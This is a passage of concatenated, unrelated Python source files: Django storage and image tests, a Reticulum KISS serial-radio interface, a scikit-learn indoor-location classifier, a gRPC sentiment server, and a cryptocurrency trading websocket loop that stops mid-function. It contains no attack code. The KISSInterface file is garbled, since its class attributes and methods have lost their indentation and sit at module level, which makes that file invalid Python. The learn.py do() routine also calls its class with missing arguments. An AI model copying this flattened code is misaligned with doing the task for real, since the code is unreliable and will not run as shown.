        self.assert_(os.path.exists(os.path.join(self.storage_dir, 'dotted.path/test')))
        self.assert_(os.path.exists(os.path.join(self.storage_dir, 'dotted.path/test_1')))

    def test_first_character_dot(self):
        """
        File names with a dot as their first character don't have an extension,
        and the underscore should get added to the end.
        """
        self.storage.save('dotted.path/.test', ContentFile("1"))
        self.storage.save('dotted.path/.test', ContentFile("2"))
        self.assert_(os.path.exists(os.path.join(self.storage_dir, 'dotted.path/.test')))
        # Before 2.6, a leading dot was treated as an extension, and so
        # underscore gets added to beginning instead of end.
        if sys.version_info < (2, 6):
            self.assert_(os.path.exists(os.path.join(self.storage_dir, 'dotted.path/_1.test')))
        else:
            self.assert_(os.path.exists(os.path.join(self.storage_dir, 'dotted.path/.test_1')))
class DimensionClosingBug(unittest.TestCase):
    """
    Test that get_image_dimensions() properly closes files (#8817)
    """
    @unittest.skipUnless(Image, "PIL not installed")
    def test_not_closing_of_files(self):
        """
        Open files passed into get_image_dimensions() should stay opened.
        """
        empty_io = StringIO()
        try:
            get_image_dimensions(empty_io)
        finally:
            self.assert_(not empty_io.closed)

    @unittest.skipUnless(Image, "PIL not installed")
    def test_closing_of_filenames(self):
        """
        get_image_dimensions() called with a filename should close the file.
        """
        # We need to inject a modified open() builtin into the images module
        # that checks if the file was closed properly if the function is
        # called with a filename instead of an file object.
        # get_image_dimensions will call our catching_open instead of the
        # regular builtin one.

        class FileWrapper(object):
            # class-level list records close() calls for later inspection
            _closed = []

            def __init__(self, f):
                self.f = f

            def __getattr__(self, name):
                return getattr(self.f, name)

            def close(self):
                self._closed.append(True)
                self.f.close()

        def catching_open(*args):
            return FileWrapper(open(*args))

        from django.core.files import images
        images.open = catching_open
        try:
            get_image_dimensions(os.path.join(os.path.dirname(__file__), "test1.png"))
        finally:
            # always remove the monkeypatch, even on failure
            del images.open
        self.assert_(FileWrapper._closed)
class InconsistentGetImageDimensionsBug(unittest.TestCase):
    """
    Test that get_image_dimensions() works properly after various calls
    using a file handler (#11158)
    """
    @unittest.skipUnless(Image, "PIL not installed")
    def test_multiple_calls(self):
        """
        Multiple calls of get_image_dimensions() should return the same size.
        """
        from django.core.files.images import ImageFile
        img_path = os.path.join(os.path.dirname(__file__), "test.png")
        image = ImageFile(open(img_path, 'rb'))
        image_pil = Image.open(img_path)
        # both calls agree with each other and with PIL's own answer
        size_1, size_2 = get_image_dimensions(image), get_image_dimensions(image)
        self.assertEqual(image_pil.size, size_1)
        self.assertEqual(size_1, size_2)
|
KISSInterface.py | from .Interface import Interface
from time import sleep
import sys
import serial
import threading
import time
import RNS
class KISS():
    """KISS TNC protocol constants and frame-escaping helper."""
    # framing bytes
    FEND            = 0xC0
    FESC            = 0xDB
    TFEND           = 0xDC
    TFESC           = 0xDD
    # command codes
    CMD_UNKNOWN     = 0xFE
    CMD_DATA        = 0x00
    CMD_TXDELAY     = 0x01
    CMD_P           = 0x02
    CMD_SLOTTIME    = 0x03
    CMD_TXTAIL      = 0x04
    CMD_FULLDUPLEX  = 0x05
    CMD_SETHARDWARE = 0x06
    CMD_READY       = 0x0F
    CMD_RETURN      = 0xFF

    @staticmethod
    def escape(data):
        # Order matters: escape FESC first so the FESC bytes inserted
        # while escaping FEND are not themselves re-escaped.
        data = data.replace(bytes([KISS.FESC]), bytes([KISS.FESC, KISS.TFESC]))
        data = data.replace(bytes([KISS.FEND]), bytes([KISS.FESC, KISS.TFEND]))
        return data
class KISSInterface(Interface):
MAX_CHUNK = 32768
owner = None
port = None
speed = None
databits = None
parity = None
stopbits = None
serial = None
def __init__(self, owner, name, port, speed, databits, parity, stopbits, preamble, txtail, persistence, slottime, flow_control, beacon_interval, beacon_data):
    """Open the serial port, start the read loop thread and push the
    KISS TNC configuration (preamble, TX tail, persistence, slot time,
    flow control) to the device.

    Raises IOError if the port is not open after construction, and
    propagates the underlying pyserial exception if opening fails.
    """
    if beacon_data == None:
        beacon_data = ""
    self.serial = None
    self.owner = owner
    self.name = name
    self.port = port
    self.speed = speed
    self.databits = databits
    self.parity = serial.PARITY_NONE
    self.stopbits = stopbits
    self.timeout = 100
    self.online = False
    self.beacon_i = beacon_interval
    self.beacon_d = beacon_data.encode("utf-8")
    self.first_tx = None
    self.packet_queue = []
    self.flow_control = flow_control
    self.interface_ready = False
    self.flow_control_timeout = 5
    self.flow_control_locked = time.time()
    # Fall back to sane defaults for unset TNC parameters
    self.preamble = preamble if preamble != None else 350
    self.txtail = txtail if txtail != None else 20
    self.persistence = persistence if persistence != None else 64
    self.slottime = slottime if slottime != None else 20
    if parity.lower() == "e" or parity.lower() == "even":
        self.parity = serial.PARITY_EVEN
    if parity.lower() == "o" or parity.lower() == "odd":
        self.parity = serial.PARITY_ODD
    try:
        RNS.log("Opening serial port "+self.port+"...")
        self.serial = serial.Serial(
            port = self.port,
            baudrate = self.speed,
            bytesize = self.databits,
            parity = self.parity,
            stopbits = self.stopbits,
            xonxoff = False,
            rtscts = False,
            timeout = 0,
            inter_byte_timeout = None,
            write_timeout = None,
            dsrdtr = False,
        )
    except Exception as e:
        RNS.log("Could not open serial port "+self.port, RNS.LOG_ERROR)
        raise e
    if self.serial.is_open:
        # Allow time for interface to initialise before config
        sleep(2.0)
        thread = threading.Thread(target=self.readLoop)
        # daemon attribute instead of the deprecated setDaemon()
        thread.daemon = True
        thread.start()
        self.online = True
        RNS.log("Serial port "+self.port+" is now open")
        RNS.log("Configuring KISS interface parameters...")
        self.setPreamble(self.preamble)
        self.setTxTail(self.txtail)
        self.setPersistence(self.persistence)
        self.setSlotTime(self.slottime)
        self.setFlowControl(self.flow_control)
        self.interface_ready = True
        RNS.log("KISS interface configured")
    else:
        raise IOError("Could not open serial port")
def setPreamble(self, preamble):
    """Set the TX preamble (milliseconds) via CMD_TXDELAY; the value
    is converted to 10 ms units and clamped to 0-255."""
    preamble_ms = preamble
    preamble = max(0, min(255, int(preamble_ms / 10)))
    kiss_command = bytes([KISS.FEND, KISS.CMD_TXDELAY, preamble, KISS.FEND])
    written = self.serial.write(kiss_command)
    if written != len(kiss_command):
        raise IOError("Could not configure KISS interface preamble to "+str(preamble_ms)+" (command value "+str(preamble)+")")
def setTxTail(self, txtail):
    """Set the TX tail (milliseconds) via CMD_TXTAIL; the value is
    converted to 10 ms units and clamped to 0-255."""
    txtail_ms = txtail
    txtail = max(0, min(255, int(txtail_ms / 10)))
    kiss_command = bytes([KISS.FEND, KISS.CMD_TXTAIL, txtail, KISS.FEND])
    written = self.serial.write(kiss_command)
    if written != len(kiss_command):
        raise IOError("Could not configure KISS interface TX tail to "+str(txtail_ms)+" (command value "+str(txtail)+")")
def setPersistence(self, persistence):
    """Set the CSMA p-persistence parameter via CMD_P, clamped to
    0-255."""
    persistence = max(0, min(255, persistence))
    kiss_command = bytes([KISS.FEND, KISS.CMD_P, persistence, KISS.FEND])
    written = self.serial.write(kiss_command)
    if written != len(kiss_command):
        raise IOError("Could not configure KISS interface persistence to "+str(persistence))
def setSlotTime(self, slottime):
    """Set the CSMA slot time (milliseconds) via CMD_SLOTTIME; the
    value is converted to 10 ms units and clamped to 0-255."""
    slottime_ms = slottime
    slottime = max(0, min(255, int(slottime_ms / 10)))
    kiss_command = bytes([KISS.FEND, KISS.CMD_SLOTTIME, slottime, KISS.FEND])
    written = self.serial.write(kiss_command)
    if written != len(kiss_command):
        raise IOError("Could not configure KISS interface slot time to "+str(slottime_ms)+" (command value "+str(slottime)+")")
def setFlowControl(self, flow_control):
    """Enable READY-event flow control signalling on the TNC.

    Note: CMD_READY is always sent with 0x01 regardless of *flow_control*
    (unchanged from the original behavior).  The previous if/else raised
    the exact same IOError in both branches, so the dead branch was removed.
    """
    kiss_command = bytes([KISS.FEND])+bytes([KISS.CMD_READY])+bytes([0x01])+bytes([KISS.FEND])
    written = self.serial.write(kiss_command)
    if written != len(kiss_command):
        raise IOError("Could not enable KISS interface flow control")
def processIncoming(self, data):
    # Hand a fully de-framed KISS payload up to the owning transport.
    self.owner.inbound(data, self)
def processOutgoing(self, data):
    """KISS-escape *data*, frame it and write it to the serial port.

    With flow control enabled the interface locks itself until the TNC
    reports READY.  If the interface is busy the packet is queued instead.
    Raises IOError on a short write.
    """
    if self.online:
        if self.interface_ready:
            if self.flow_control:
                self.interface_ready = False
                self.flow_control_locked = time.time()
            # Escape FESC (0xdb) first, then FEND (0xc0), per the KISS spec.
            data = data.replace(bytes([0xdb]), bytes([0xdb])+bytes([0xdd]))
            data = data.replace(bytes([0xc0]), bytes([0xdb])+bytes([0xdc]))
            frame = bytes([KISS.FEND])+bytes([0x00])+data+bytes([KISS.FEND])
            written = self.serial.write(frame)
            # Beacon transmissions reset the beacon timer; any other
            # transmission starts it.
            if data == self.beacon_d:
                self.first_tx = None
            else:
                if self.first_tx == None:
                    self.first_tx = time.time()
            if written != len(frame):
                # Bug fix: the message previously reported len(data), but the
                # write (and this comparison) are against the framed length.
                raise IOError("Serial interface only wrote "+str(written)+" bytes of "+str(len(frame)))
        else:
            self.queue(data)
def queue(self, data):
    # Buffer an outgoing packet until the interface becomes ready again.
    self.packet_queue.append(data)
def process_queue(self):
    """Mark the interface ready again and transmit the next queued packet,
    if one is waiting."""
    if self.packet_queue:
        next_packet = self.packet_queue.pop(0)
        self.interface_ready = True
        self.processOutgoing(next_packet)
    else:
        self.interface_ready = True
def readLoop(self):
    # Main receive loop: de-frames KISS data from the serial port, delivers
    # complete data frames to processIncoming(), and services flow-control
    # and beacon timers while the port is idle.  Any exception takes the
    # interface offline permanently.
    try:
        in_frame = False
        escape = False
        command = KISS.CMD_UNKNOWN
        data_buffer = b""
        last_read_ms = int(time.time()*1000)
        while self.serial.is_open:
            if self.serial.in_waiting:
                byte = ord(self.serial.read(1))
                last_read_ms = int(time.time()*1000)
                if (in_frame and byte == KISS.FEND and command == KISS.CMD_DATA):
                    # Closing FEND of a data frame: deliver the payload.
                    in_frame = False
                    self.processIncoming(data_buffer)
                elif (byte == KISS.FEND):
                    # Opening FEND: start collecting a new frame.
                    in_frame = True
                    command = KISS.CMD_UNKNOWN
                    data_buffer = b""
                elif (in_frame and len(data_buffer) < RNS.Reticulum.MTU):
                    if (len(data_buffer) == 0 and command == KISS.CMD_UNKNOWN):
                        # We only support one HDLC port for now, so
                        # strip off the port nibble
                        byte = byte & 0x0F
                        command = byte
                    elif (command == KISS.CMD_DATA):
                        if (byte == KISS.FESC):
                            escape = True
                        else:
                            if (escape):
                                # Undo KISS escaping (FESC TFEND / FESC TFESC).
                                if (byte == KISS.TFEND):
                                    byte = KISS.FEND
                                if (byte == KISS.TFESC):
                                    byte = KISS.FESC
                                escape = False
                            data_buffer = data_buffer+bytes([byte])
                    elif (command == KISS.CMD_READY):
                        # TNC signalled flow-control READY: release next packet.
                        self.process_queue()
            else:
                # No data waiting: expire a stale partial frame, then idle.
                time_since_last = int(time.time()*1000) - last_read_ms
                if len(data_buffer) > 0 and time_since_last > self.timeout:
                    data_buffer = b""
                    in_frame = False
                    command = KISS.CMD_UNKNOWN
                    escape = False
                sleep(0.05)
                if self.flow_control:
                    # Unlock flow control if the READY event never arrived.
                    if not self.interface_ready:
                        if time.time() > self.flow_control_locked + self.flow_control_timeout:
                            RNS.log("Interface "+str(self)+" is unlocking flow control due to time-out. This should not happen. Your hardware might have missed a flow-control READY command, or maybe it does not support flow-control.", RNS.LOG_WARNING)
                            self.process_queue()
                if self.beacon_i != None and self.beacon_d != None:
                    # Transmit beacon data once the configured interval has
                    # elapsed since the first non-beacon transmission.
                    if self.first_tx != None:
                        if time.time() > self.first_tx + self.beacon_i:
                            RNS.log("Interface "+str(self)+" is transmitting beacon data: "+str(self.beacon_d.decode("utf-8")), RNS.LOG_DEBUG)
                            self.first_tx = None
                            self.processOutgoing(self.beacon_d)
    except Exception as e:
        self.online = False
        RNS.log("A serial port error occurred, the contained exception was: "+str(e), RNS.LOG_ERROR)
        RNS.log("The interface "+str(self.name)+" is now offline. Restart Reticulum to attempt reconnection.", RNS.LOG_ERROR)
def __str__(self):
    """Human-readable interface identifier used in log output."""
    return "KISSInterface[{}]".format(self.name)
learn.py | #!/usr/bin/python3
import json
import csv
from random import shuffle
import warnings
import pickle
import gzip
import operator
import time
import logging
import math
from threading import Thread
import functools
import multiprocessing
# Configure the 'learn' logger: DEBUG-level records go both to learn.log
# and to the console, with a shared timestamped format.
logger = logging.getLogger('learn')
logger.setLevel(logging.DEBUG)
fh = logging.FileHandler('learn.log')
fh.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
formatter = logging.Formatter(
    '%(asctime)s - [%(name)s/%(funcName)s] - %(levelname)s - %(message)s')
fh.setFormatter(formatter)
ch.setFormatter(formatter)
logger.addHandler(fh)
logger.addHandler(ch)
import numpy
from sklearn.feature_extraction import DictVectorizer
from sklearn.pipeline import make_pipeline
from sklearn.neural_network import MLPClassifier
from sklearn.neighbors import KNeighborsClassifier
from sklearn.svm import SVC
from sklearn.gaussian_process import GaussianProcessClassifier
from sklearn.gaussian_process.kernels import RBF
from sklearn.tree import DecisionTreeClassifier
from sklearn.ensemble import RandomForestClassifier, AdaBoostClassifier
from sklearn.naive_bayes import GaussianNB
from sklearn.discriminant_analysis import QuadraticDiscriminantAnalysis
from sklearn import cluster, mixture
from sklearn.neighbors import kneighbors_graph
from naive_bayes import ExtendedNaiveBayes
from naive_bayes2 import ExtendedNaiveBayes2
def timeout(timeout):
    """Decorator factory: run the wrapped call in a daemon thread and give
    it at most *timeout* seconds to finish.

    If the call completes in time, its return value is passed through and
    any exception it raised is re-raised.  If it is still running when the
    deadline expires, a generic Exception is raised instead; the worker
    thread itself cannot be killed and is left to finish as a daemon.
    """
    def deco(func):
        @functools.wraps(func)
        def wrapper(*args, **kwargs):
            # Pre-load the slot with the timeout error; the worker thread
            # overwrites it with the real result (or the real exception).
            outcome = [Exception('function [%s] timeout [%s seconds] exceeded!' % (
                func.__name__, timeout))]

            def runner():
                try:
                    outcome[0] = func(*args, **kwargs)
                except Exception as exc:
                    outcome[0] = exc

            worker = Thread(target=runner)
            worker.daemon = True
            worker.start()
            worker.join(timeout)
            result = outcome[0]
            if isinstance(result, BaseException):
                raise result
            return result
        return wrapper
    return deco
class AI(object):
    """Trains a set of scikit-learn classifiers on a CSV of sensor readings
    and serves per-algorithm location predictions from them."""

    def __init__(self, family, path_to_data):
        self.logger = logging.getLogger('learn.AI')
        # Bidirectional mapping between location names and numeric labels.
        self.naming = {'from': {}, 'to': {}}
        self.family = family
        self.path_to_data = path_to_data

    def classify(self, sensor_data):
        """Return predictions for one reading from every trained algorithm.

        sensor_data is expected as {'s': {sensorType: {sensorName: value}}}
        (TODO confirm against caller); sensors unseen during training are
        ignored, and is_unknown is True when none of the sensors matched.
        """
        header = self.header[1:]
        is_unknown = True
        csv_data = numpy.zeros(len(header))
        for sensorType in sensor_data['s']:
            for sensor in sensor_data['s'][sensorType]:
                sensorName = sensorType + "-" + sensor
                if sensorName in header:
                    is_unknown = False
                    csv_data[header.index(sensorName)] = sensor_data[
                        's'][sensorType][sensor]
        self.headerClassify = header
        self.csv_dataClassify = csv_data.reshape(1, -1)
        payload = {'location_names': self.naming['to'], 'predictions': []}
        # Run every algorithm concurrently, one thread each; each thread
        # writes its payload into self.results[i] (or leaves None on failure).
        threads = [None] * len(self.algorithms)
        self.results = [None] * len(self.algorithms)
        for i, alg in enumerate(self.algorithms.keys()):
            threads[i] = Thread(target=self.do_classification, args=(i, alg))
            threads[i].start()
        for i, _ in enumerate(self.algorithms.keys()):
            threads[i].join()
        for result in self.results:
            if result is not None:
                payload['predictions'].append(result)
        payload['is_unknown'] = is_unknown
        return payload

    def do_classification(self, index, name):
        """Predict with one algorithm and store its payload in
        self.results[index].

        Stores nothing when the classifier raises or yields NaN
        probabilities.
        """
        if name == 'Gaussian Process':
            # Deliberately skipped for online classification (see the
            # commented-out entry in learn()'s classifier list).
            return
        t = time.time()
        try:
            prediction = self.algorithms[
                name].predict_proba(self.csv_dataClassify)
        except Exception as e:
            logger.error(self.csv_dataClassify)
            logger.error(str(e))
            return
        predict = {}
        for i, pred in enumerate(prediction[0]):
            predict[i] = pred
        predict_payload = {'name': name,
                           'locations': [], 'probabilities': []}
        badValue = False
        # Emit locations sorted by descending probability.
        for tup in sorted(predict.items(), key=operator.itemgetter(1), reverse=True):
            predict_payload['locations'].append(str(tup[0]))
            predict_payload['probabilities'].append(
                round(float(tup[1]), 2))
            if math.isnan(tup[1]):
                badValue = True
                break
        if badValue:
            return
        self.results[index] = predict_payload

    @timeout(10)
    def train(self, clf, x, y):
        # Hard 10 s cap so a pathological classifier cannot hang learning.
        return clf.fit(x, y)

    def learn(self, fname):
        """Load the CSV at *fname* and train every configured classifier.

        Column 0 holds the class label (location name); remaining columns
        are sensor readings.  Non-numeric cells are mapped to integers via
        self.naming; empty cells become 0.
        """
        t = time.time()
        # load CSV file
        self.header = []
        rows = []
        naming_num = 0
        with open(fname, 'r') as csvfile:
            reader = csv.reader(csvfile, delimiter=',')
            for i, row in enumerate(reader):
                if i == 0:
                    self.header = row
                else:
                    for j, val in enumerate(row):
                        if val == '':
                            row[j] = 0
                            continue
                        try:
                            row[j] = float(val)
                        except ValueError:
                            # Non-numeric cell: treat it as a location name
                            # and assign it the next numeric label.
                            if val not in self.naming['from']:
                                self.naming['from'][val] = naming_num
                                self.naming['to'][naming_num] = val
                                naming_num += 1
                            row[j] = self.naming['from'][val]
                    rows.append(row)
        # first column in row is the classification, Y
        y = numpy.zeros(len(rows))
        x = numpy.zeros((len(rows), len(rows[0]) - 1))
        # shuffle it up for training
        record_range = list(range(len(rows)))
        shuffle(record_range)
        for i in record_range:
            y[i] = rows[i][0]
            x[i, :] = numpy.array(rows[i][1:])
        names = [
            "Nearest Neighbors",
            "Linear SVM",
            "RBF SVM",
            # "Gaussian Process",
            "Decision Tree",
            "Random Forest",
            "Neural Net",
            "AdaBoost",
            "Naive Bayes",
            "QDA"]
        classifiers = [
            KNeighborsClassifier(3),
            SVC(kernel="linear", C=0.025, probability=True),
            SVC(gamma=2, C=1, probability=True),
            # GaussianProcessClassifier(1.0 * RBF(1.0), warm_start=True),
            DecisionTreeClassifier(max_depth=5),
            RandomForestClassifier(
                max_depth=5, n_estimators=10, max_features=1),
            MLPClassifier(alpha=1),
            AdaBoostClassifier(),
            GaussianNB(),
            QuadraticDiscriminantAnalysis()]
        self.algorithms = {}
        for name, clf in zip(names, classifiers):
            t2 = time.time()
            self.logger.debug("learning {}".format(name))
            try:
                self.algorithms[name] = self.train(clf, x, y)
                # Bug fix: elapsed time is now - t2; the original computed
                # t2 - now and logged negative durations.
                self.logger.debug("learned {}, {:d} ms".format(
                    name, int(1000 * (time.time() - t2))))
            except Exception as e:
                self.logger.error("{} {}".format(name, str(e)))
        self.logger.debug("{:d} ms".format(int(1000 * (time.time() - t))))

    def save(self, save_file):
        """Pickle header, naming, algorithms and family to a gzip file."""
        t = time.time()
        with gzip.open(save_file, 'wb') as f:
            pickle.dump(self.header, f)
            pickle.dump(self.naming, f)
            pickle.dump(self.algorithms, f)
            pickle.dump(self.family, f)
        self.logger.debug("{:d} ms".format(int(1000 * (time.time() - t))))

    def load(self, save_file):
        """Restore the state written by save(); load order must match."""
        t = time.time()
        with gzip.open(save_file, 'rb') as f:
            self.header = pickle.load(f)
            self.naming = pickle.load(f)
            self.algorithms = pickle.load(f)
            self.family = pickle.load(f)
        self.logger.debug("{:d} ms".format(int(1000 * (time.time() - t))))
def do():
    """Exploratory routine comparing clustering algorithms against the
    known labels of a trained AI instance, printing cluster overlaps.

    NOTE(review): this looks like dead scratch code — AI() is called
    without its required (family, path_to_data) arguments, ai.load()
    without a file, and AI defines no .x/.y attributes; it will raise as
    written.  Left intact apart from concrete fixes below — confirm intent
    before relying on it.
    """
    ai = AI()
    ai.load()
    # ai.learn()
    params = {'quantile': .3,
              'eps': .3,
              'damping': .9,
              'preference': -200,
              'n_neighbors': 10,
              'n_clusters': 3}
    # Shared inputs for the connectivity-based algorithms.
    bandwidth = cluster.estimate_bandwidth(ai.x, quantile=params['quantile'])
    connectivity = kneighbors_graph(
        ai.x, n_neighbors=params['n_neighbors'], include_self=False)
    # make connectivity symmetric
    connectivity = 0.5 * (connectivity + connectivity.T)
    ms = cluster.MeanShift(bandwidth=bandwidth, bin_seeding=True)
    two_means = cluster.MiniBatchKMeans(n_clusters=params['n_clusters'])
    ward = cluster.AgglomerativeClustering(
        n_clusters=params['n_clusters'], linkage='ward',
        connectivity=connectivity)
    spectral = cluster.SpectralClustering(
        n_clusters=params['n_clusters'], eigen_solver='arpack',
        affinity="nearest_neighbors")
    dbscan = cluster.DBSCAN(eps=params['eps'])
    affinity_propagation = cluster.AffinityPropagation(
        damping=params['damping'], preference=params['preference'])
    average_linkage = cluster.AgglomerativeClustering(
        linkage="average", affinity="cityblock",
        n_clusters=params['n_clusters'], connectivity=connectivity)
    birch = cluster.Birch(n_clusters=params['n_clusters'])
    gmm = mixture.GaussianMixture(
        n_components=params['n_clusters'], covariance_type='full')
    clustering_algorithms = (
        ('MiniBatchKMeans', two_means),
        ('AffinityPropagation', affinity_propagation),
        ('MeanShift', ms),
        ('SpectralClustering', spectral),
        ('Ward', ward),
        ('AgglomerativeClustering', average_linkage),
        ('DBSCAN', dbscan),
        ('Birch', birch),
        ('GaussianMixture', gmm)
    )
    for name, algorithm in clustering_algorithms:
        with warnings.catch_warnings():
            # Silence known benign warnings from the connectivity graph.
            warnings.filterwarnings(
                "ignore",
                message="the number of connected components of the " +
                "connectivity matrix is [0-9]{1,2}" +
                " > 1. Completing it to avoid stopping the tree early.",
                category=UserWarning)
            warnings.filterwarnings(
                "ignore",
                message="Graph is not fully connected, spectral embedding" +
                " may not work as expected.",
                category=UserWarning)
            try:
                algorithm.fit(ai.x)
            except Exception:
                # Skip algorithms that cannot fit this data at all.
                continue
        if hasattr(algorithm, 'labels_'):
            # Bug fix: the numpy.int alias was removed in NumPy 1.24;
            # the builtin int is the documented replacement.
            y_pred = algorithm.labels_.astype(int)
        else:
            y_pred = algorithm.predict(ai.x)
        if max(y_pred) > 3:
            # Skip results that fragment the data into too many clusters.
            continue
        known_groups = {}
        for i, group in enumerate(ai.y):
            group = int(group)
            if group not in known_groups:
                known_groups[group] = []
            known_groups[group].append(i)
        guessed_groups = {}
        for i, group in enumerate(y_pred):
            if group not in guessed_groups:
                guessed_groups[group] = []
            guessed_groups[group].append(i)
        # Print the overlap size between each known group and each cluster.
        for k in known_groups:
            for g in guessed_groups:
                print(
                    k, g, len(set(known_groups[k]).intersection(guessed_groups[g])))
# ai = AI()
# ai.learn("../testing/testdb.csv")
# ai.save("dGVzdGRi.find3.ai")
# ai.load("dGVzdGRi.find3.ai")
# a = json.load(open('../testing/testdb_single_rec.json'))
# classified = ai.classify(a)
# print(json.dumps(classified,indent=2))
|
sentiment_analysis_server.py | import grpc
from concurrent import futures
import threading
import logging
# import the generated classes :
import model_pb2
import model_pb2_grpc
from app import app_run
# import the function we made :
import model as psp
port = 8061
results = []
# create a class to define the server functions, derived from
class sentiment_analysis_modelServicer(model_pb2_grpc.sentiment_analysis_modelServicer):
    """gRPC servicer exposing the sentiment-analysis model."""

    def classify_review(self, request, context):
        """Classify request.query and return a Review_Classify response.

        Also appends a "query|label" line to results.txt as a crude audit
        log.  NOTE(review): the file is shared across ThreadPoolExecutor
        workers without a lock — confirm concurrent writes are acceptable.
        """
        # define the buffer of the response :
        response = model_pb2.Review_Classify()
        # get the value of the response by calling the desired function :
        response.review = psp.classify_review(request.query)
        # The with-statement closes the file; the explicit f.close() that
        # used to follow was redundant, and the unused `result` local and
        # dead commented loop were removed.
        with open("results.txt", mode="a+") as f:
            f.write(str(request.query) + "|" + str(response.review) + "\n")
        return response
def serve():
    """Start the gRPC server, launch the web app in a side thread, and
    block until the server terminates."""
    server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))
    model_pb2_grpc.add_sentiment_analysis_modelServicer_to_server(sentiment_analysis_modelServicer(), server)
    server.add_insecure_port('[::]:{}'.format(port))
    server.start()
    # Bug fix: pass the callable itself.  target=app_run() invoked the app
    # synchronously in this thread (blocking before wait_for_termination)
    # and handed its return value to Thread as the target.
    threading.Thread(target=app_run).start()
    server.wait_for_termination()
if __name__ == '__main__':
    logging.basicConfig()
    # Truncate any results left over from a previous run before serving.
    open('results.txt', 'w').close()
    serve()
|
wss.py | # -*- coding: utf-8 -*-
"""
Created on Sat Mar 24 00:16:07 2020
@author: tranl
"""
import time, sys, math
import numpy as np
import pandas as pd
import websocket
import threading
import json
from tradingpy import PRICEPRE, SIDE, Signal
from utility import print_, orderstr, timestr, barstr
def wss_run(*args):
    """Run one websocket trading session.

    *args* unpacks (see bottom of this function) to
    (portfolio, client, testnet, stream, models, fileout).  Opens the
    exchange user-data stream, then on_open spawns three worker threads:
    data_stream (subscription + keepalive), strategy (signal generation)
    and book_manager (order placement/tracking).  Blocks in
    ws.run_forever() until book_manager closes the socket, then returns
    the per-symbol Signal lists.
    """
    def on_message(ws, message):
        '''
        Control the message received from
        '''
        mess = json.loads(message)
        if mess['e'] == 'kline':
            kln = mess['k']
            if kln['x'] is True:
                # Candle closed: normalize it and append to the symbol's
                # kline history shared with the worker threads.
                symbol = kln['s'].upper()
                new_kln = { '_t': int(kln['t']), '_o': float(kln['o']), '_h': float(kln['h']), '_l': float(kln['l']), '_c': float(kln['c']), '_v': float(kln['q']) }
                SymKlns[symbol].append(new_kln)
                print_( '%d. %s\t' % (len(SymKlns[symbol]), symbol) + timestr(new_kln['_t']) + '\t' + \
                        ''.join(['{:>3}:{:<10}'.format(k, v) for k,v in iter(new_kln.items()) if not k=='_t']), fileout)

    def on_error(ws, error):
        '''
        Do something when websocket has an error
        '''
        pass

    def on_close(ws):
        '''
        Do something when websocket closes
        '''
        pass

    def on_open(ws, *args):
        '''
        Main function to run multi-threading
        '''
        def data_stream(*args):
            '''
            First thread to send subscription to the exchange
            '''
            params = [str.lower(ins) + str(s) for ins in insIds for s in stream]
            print_(params, fileout)
            ws.send(json.dumps({"method": "SUBSCRIBE", "params": params, "id": 1 }))
            t1_idx = 0
            while True:
                # Keep the listen key alive every 5 closed candles while
                # the session is still running.
                if len(SymKlns[insIds[0]]) % 5 == 0 and len(SymKlns[insIds[0]]) > t1_idx and len(SymKlns[insIds[0]]) < models[insIds[0]].pdObserve:
                    client.keepalive_stream()
                    t1_idx = len(SymKlns[insIds[0]])

        def strategy(*args):
            '''
            Second thread to generate signals upon the message from the exchange
            '''
            t2_idx = {}
            for symbol in insIds:
                t2_idx[symbol] = 0
            # Session runs until pdObserve candles have been collected.
            while len(SymKlns[insIds[0]]) < models[insIds[0]].pdObserve:
                for symbol in insIds:
                    sym_ = SymKlns[symbol].copy()
                    if len(sym_) > t2_idx[symbol]:
                        # New candle(s) arrived for this symbol.
                        if models[symbol].modelType == 'bollinger':
                            data_ob = pd.DataFrame(sym_)
                            model_sig = models[symbol].get_last_signal(dataObserve=data_ob)
                        else: model_sig = None
                        if model_sig is not None:
                            ready = True
                            if ready:
                                side, positionSide, startTime = model_sig['side'], model_sig['positionSide'], model_sig['_t']+60*1000
                                expTime, price = startTime + 5*60*1000, round(model_sig['_p'], PRICEPRE[symbol]) #
                                stopLoss = model_sig['atr']
                                takeProfit = model_sig['atr']
                                new_sig = Signal(symbol=symbol, side=side, size=models[symbol].orderSize, orderType='LIMIT', positionSide=positionSide, price=price, startTime=startTime, expTime=expTime, \
                                                 stopLoss=stopLoss, takeProfit=takeProfit, timeLimit=models[symbol].pdEstimate*60, timeInForce='GTC')
                                # Reject the signal when already in a position
                                # or the side's equity allocation is full.
                                if in_possition_(Signals[symbol], side='BOTH') or position_count(insIds, Signals, side=side) >= portfolio.equityDist[side]:
                                    new_sig.set_expired()
                                else:
                                    # Replace any still-waiting signals with
                                    # the fresher one.
                                    for sig in Signals[symbol]:
                                        if sig.is_waiting():
                                            sig.set_expired()
                                            print_('\n\tSet WAITING signal EXPIRED: \n\t' + str(sig), fileout)
                                    Signals[symbol].append(new_sig)
                                    print_('\n\tFOUND ' + str(new_sig), fileout)
                        t2_idx[symbol] = len(sym_)

        def book_manager(*args):
            '''
            Third thread to excecute/cancel/track the signals generated in strategy()
            '''
            while len(SymKlns[insIds[0]]) < models[insIds[0]].pdObserve:
                time.sleep(1)
                for symbol in insIds:
                    in_position = False
                    last_signal = None
                    for sig in Signals[symbol]:
                        model = models[symbol]
                        sv_time = client.timestamp()
                        if sig.is_waiting():
                            ### Check for EXPIRED order here ###
                            if sv_time > sig.expTime:
                                sig.set_expired()
                                print_('\n\tSet WAITING signal EXPIRED: \n\t' + str(sig), fileout)
                            else:
                                last_signal = sig
                        elif sig.is_ordered():
                            ### Set ACTIVE order here ###
                            in_position = True
                            order_update = client.query_order(symbol, sig.orderId)
                            if order_update['status'] == 'FILLED':
                                sig.set_active(excTime=order_update['updateTime'], excPrice=order_update['avgPrice'], excQty=order_update['executedQty'])
                                sig.path_update(lastTime=sig.excTime, lastPrice=sig.excPrice)
                                print_('\n\tSet BOOKED order ACTIVE: \n\t' + str(sig) + '\n\t' + orderstr(order_update), fileout)
                            ### PROBLEM 3 Insert your code to handle EXPIRED and PARTIALLY_FILLED order here ###
                        elif sig.is_active():
                            ### Control ACTIVE position here ###
                            in_position = True
                            recent_trades = model.marketData.recent_trades(limit=5)
                            for trade in recent_trades:
                                if int(trade['time']) > sig.pricePath[-1]['timestamp']:
                                    sig.path_update({'timestamp': trade['time'], 'price': trade['price']})
                            exit_sign, pos = sig.exit_triggers()
                            if exit_sign:
                                # Exit trigger fired: close with a MARKET
                                # counter order.
                                print_('\n\tFound ' + str(exit_sign) + '{}\n'.format(round(pos,4)), fileout)
